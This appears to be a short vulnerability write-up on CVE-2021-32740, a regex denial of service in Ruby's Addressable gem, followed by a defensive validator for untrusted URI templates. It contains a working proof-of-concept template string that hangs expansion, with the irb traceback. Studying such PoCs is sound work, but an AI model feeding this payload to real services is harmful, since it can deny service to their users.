CVE-2021-32740
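The fix commit is this one.
The PoC is as follows. The issue occurs when the variable names used in a template can be controlled from outside.
GHSA rates it High, but I think cases like this are probably rare.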
irb(main):032:0> template = Addressable::Template.new("http://example.com/{000000000000000000000000000000!}")
=> #<Addressable::Template:0x1e0 PATTERN:http://example.com/{000000000000000000000000000000!}>
irb(main):033:0> Timeout.timeout(10) { template.expand({}) }
Traceback (most recent call last):
    23: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `<main>'
    22: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/bin/irb:23:in `load'
    21: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/irb-1.3.3/exe/irb:11:in `<top (required)>'
     4: from (irb):33:in `<main>'
     3: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/timeout-0.1.1/lib/timeout.rb:112:in `timeout'
     2: from (irb):33:in `block in <main>'
     1: from /Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `expand'
/Users/pivot_root/.anyenv/envs/rbenv/versions/2.7.2/lib/ruby/gems/2.7.0/gems/addressable-2.7.0/lib/addressable/template.rb:595:in `gsub!': execution expired (Timeout::Error)
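
As an added example (not from the original post or from the Addressable project), here is a pre-check an application could run on an externally supplied template string before handing it to `Addressable::Template.new`. It follows the RFC 6570 variable-name grammar using only single, non-nested quantifiers, and it rejects the PoC expression above. The function names and length limits are assumptions, and it is a pre-filter, not a replacement for the fix.

```ruby
# Added example: linear-time pre-validation of untrusted URI template strings.
# All names and limits below are hypothetical, chosen for illustration.
MAX_TEMPLATE_LEN = 2048 # assumed cap on the whole template
MAX_VARNAME_LEN  = 64   # assumed cap on one variable name

# One character class with one quantifier: no nested repetition to backtrack over.
VARNAME_CHARS = /\A[A-Za-z0-9_.%]+\z/
BAD_PERCENT   = /%(?![0-9A-Fa-f]{2})/ # "%" not followed by two hex digits
OPERATORS     = "+#./;?&"             # operators defined by RFC 6570

def varname_ok?(name)
  return false if name.empty? || name.length > MAX_VARNAME_LEN
  return false unless VARNAME_CHARS.match?(name)
  return false if name.match?(BAD_PERCENT)
  # Dots may only separate name segments.
  !(name.start_with?(".") || name.end_with?(".") || name.include?(".."))
end

def template_expressions(template)
  # Negated class inside braces: each character is examined once.
  template.scan(/\{([^{}]*)\}/).flatten
end

def expression_ok?(expr)
  return false if expr.empty?
  body  = OPERATORS.include?(expr[0]) ? expr[1..] : expr
  specs = body.split(",", -1)
  return false if specs.empty?
  specs.all? do |spec|
    # Strip a trailing explode (*) or prefix (:1..9999) modifier.
    varname_ok?(spec.sub(/(?:\*|:[1-9][0-9]{0,3})\z/, ""))
  end
end

def safe_template?(template)
  return false if template.length > MAX_TEMPLATE_LEN
  opens = template.count("{")
  return false if opens != template.count("}")
  exprs = template_expressions(template)
  # Nested or stray braces leave fewer expressions than opening braces.
  return false if exprs.length != opens
  exprs.all? { |e| expression_ok?(e) }
end

# Constructed sample inputs; the first is the PoC template shown above.
poc = "http://example.com/{000000000000000000000000000000!}"
puts "PoC accepted?   #{safe_template?(poc)}"
puts "Valid accepted? #{safe_template?('http://example.com/{?query,page*}')}"
```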